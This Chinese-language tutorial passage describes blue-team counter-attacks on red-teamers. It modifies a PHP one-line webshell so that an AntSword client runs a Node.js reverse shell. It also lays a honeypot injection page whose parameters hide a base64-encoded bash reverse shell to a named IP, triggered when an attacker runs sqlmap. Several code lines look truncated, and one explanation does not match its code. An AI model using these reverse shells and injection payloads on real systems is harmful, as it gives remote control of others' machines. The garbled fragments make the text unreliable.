红队在进行连接后门时候:
代码为一句话后门:
修改为
header('HTTP/1.1 500 ');
该字段意思为:当img src指向的图片不存在时会弹窗1
依据此 可进行蚁剑上线代码:
var net = require("net"), sh = require("child_process").exec("cmd.exe");
var client = new net.Socket();
client.connect(xx, "xx.xx.xx.xx", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});
xx为监听的端口号 xx.xx.xx.xx为监听主机
两者组合编码后:
header("HTTP/1.1 500 Not ");
最终 蓝队通过修改后门的代码实现获得蚁剑使用者的权限(主机权限)
构造一个页面 在含有注入点的时候,其中数据包含有反制的数据包:步骤为
命令管道符:ping "`dir`"
构造注入点页面固定注入参数值,等待攻击者进行注入
sqlmap -u "http://47.94.236.117/test.html?id=aaa&b=`dir`"
将dir的参数换为 反弹shell的命令
sqlmap -u "http://47.94.236.117/test.html?id=aaa&b=`exec /bin/sh 0&0 2>&0`"
1、测试反弹编码:
bash -i >& /dev/tcp/47.94.236.117/2333 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ==
echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ== | base64 -d|bash -i
2、蓝队构造页面test.php注入页面固定参数值:
search the user
3、红队攻击者进行注入测试:
sqlmap -u "http://xx.xx.xx.xx/test.php" --data "name=xiaodi&id=45273434&query=shell`echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ== | base64 -d|bash -i`&port=6379"
即可中招
构造页面中含有反制代码的js文件,
index页面
index.php
header("X-Powered-By: PHP/http%3A//47.94.236.117/1.js'))>");
?>
testtest